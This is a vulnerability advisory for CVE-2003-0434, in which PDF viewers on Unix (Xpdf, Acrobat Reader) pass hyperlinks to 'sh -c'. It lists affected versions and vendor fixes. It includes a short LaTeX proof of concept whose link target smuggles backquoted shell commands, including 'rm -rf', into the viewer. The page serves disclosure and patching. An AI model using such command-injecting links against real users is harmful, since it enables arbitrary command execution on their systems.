Multiple Vendor PDF Hyperlinks Arbitrary Command Execution Vulnerability

BID:7912

Info

Multiple Vendor PDF Hyperlinks Arbitrary Command Execution Vulnerability

Bugtraq ID: 7912
Class: Input Validation Error
CVE: CVE-2003-0434
Remote: Yes
Local: No
Published: Jun 13 2003 12:00AM
Updated: Jul 11 2009 10:06PM
Credit: The discovery of this vulnerability has been credited to Martyn Gilmore <[email protected]>.
Vulnerable: Yellow Dog Linux 3.0
Xpdf Xpdf 2.0 1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.1
+ Terra Soft Solutions Yellow Dog Linux 3.0
Xpdf Xpdf 2.0
Xpdf Xpdf 1.0 1
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
+ Gentoo Linux 1.2
+ Gentoo Linux 1.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.2
Xpdf Xpdf 1.0 0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
+ Debian Linux 3.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Workstation 8.0
Xpdf Xpdf 0.93
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
Xpdf Xpdf 0.92
+ Sun Linux 5.0.6
+ Sun Linux 5.0.5
+ Sun Linux 5.0.5
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0.3
+ Sun Linux 5.0.3
+ Sun Linux 5.0
+ Sun Linux 5.0
+ Sun Linux 5.0
+ Turbolinux Turbolinux 6.0
+ Turbolinux Turbolinux 6.0
+ Turbolinux Turbolinux 6.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Workstation 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux 6.0
Sun Linux 5.0.6
Sun Linux 5.0.5
Sun Linux 5.0.3
Sun Linux 5.0
+ Sun LX50
Redhat Linux Advanced Work Station 2.1
Redhat Linux 9.0 i386
Redhat Linux 8.0 i386
Redhat Linux 7.3 i386
Redhat Linux 7.2 ia64
Redhat Linux 7.2 i386
Redhat Linux 7.1
Redhat Enterprise Linux WS 2.1 IA64
Redhat Enterprise Linux WS 2.1
Redhat Enterprise Linux ES 2.1 IA64
Redhat Enterprise Linux ES 2.1
Redhat Enterprise Linux AS 2.1 IA64
Redhat Enterprise Linux AS 2.1
Adobe Acrobat Reader (UNIX) 5.0 6
Not Vulnerable:

Discussion

Multiple Vendor PDF Hyperlinks Arbitrary Command Execution Vulnerability

A vulnerability has been reported for multiple PDF viewers for Unix variant operating systems. The problem is said to occur when hyperlinks have been enabled within the viewer. Allegedly, by placing a specially formatted hyperlink within a PDF file it is possible to execute arbitrary shell commands when a user clicks the link. This is due to the PDF viewer invoking an external application, via a call to 'sh -c', to handle the request.

Successful exploitation of this vulnerability could potentially allow an attacker to execute arbitrary commands on a target system with the privileges of the user invoking the PDF document.

It should be noted that this vulnerability may be similar to that described in BID 1624.

** Reports suggest that the fixes supplied by Red Hat and Mandrake Linux do not adequately fix the problem. Specifically, the fixes make changes to xpdf to filter out back quote characters. The problem lies in the fact that other shell metacharacters are not filtered. Thus it may still be possible for attackers to execute arbitrary commands. Red Hat has released updated advisories to correct this oversight.

Exploit / POC

Multiple Vendor PDF Hyperlinks Arbitrary Command Execution Vulnerability

The following proof of concept was provided by [email protected]:

\documentclass[11pt]{minimal}
\usepackage{color}
\usepackage[urlcolor=blue,colorlinks=true,pdfpagemode=none]{hyperref}
\begin{document}
\href{prot:hyperlink with stuff, say, `rm -rf /tmp/abc`; touch /tmp/pqr}{\textt\t{Click me}}
\end{document}

The source of a sample PDF file has been released which demonstrates this issue.

Solution / Fix

Multiple Vendor PDF Hyperlinks Arbitrary Command Execution Vulnerability

Solution:
Red Hat has released an updated advisory RHSA-2003:196-02 to address this issue. Information regarding obtaining and applying fixes is available in the referenced advisory.

Conectiva has released advisory (CLA-2003:674) to address this issue. Fixes are available below.

Gentoo Linux has released advisory 200306-11 to address this issue. Affected users are advised to issue the following commands to update vulnerable systems:

emerge sync
emerge xpdf
emerge clean

Gentoo Linux has released advisory 200306-12 to address this issue. Affected users are advised to issue the following commands to update vulnerable systems:

emerge sync
emerge acroread
emerge clean

TurboLinux has released an advisory. Affected users are advised to use the turbopkg tool to apply the updates. Further information is available in the referenced advisory.

Mandrake has released an updated advisory (MDKSA-2003:071-1) that addresses this issue. Please see the attached advisory for details on obtaining and applying fixes. The previous Mandrake advisory (MDKSA-2003:071) did not properly address all of these issues.

Sun has released a fix for Sun Linux 5.0.6.

Red Hat has released an updated advisory (RHSA-2003:197-10) that addresses this issue on Enterprise platforms. Please see the attached advisory for further details. These fixes are only available via the Red Hat Network.

Yellow Dog has released an advisory and fixes to address this issue.

The following fixes are available:


Xpdf Xpdf 0.92

Xpdf Xpdf 1.0 1

Xpdf Xpdf 1.0 0

Xpdf Xpdf 2.0 1

Yellow Dog Linux 3.0

Redhat Linux 7.1

Redhat Linux 7.2 i386

Redhat Linux 7.2 ia64

Redhat Linux 7.3 i386

Redhat Linux 8.0 i386

Redhat Linux 9.0 i386

References

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report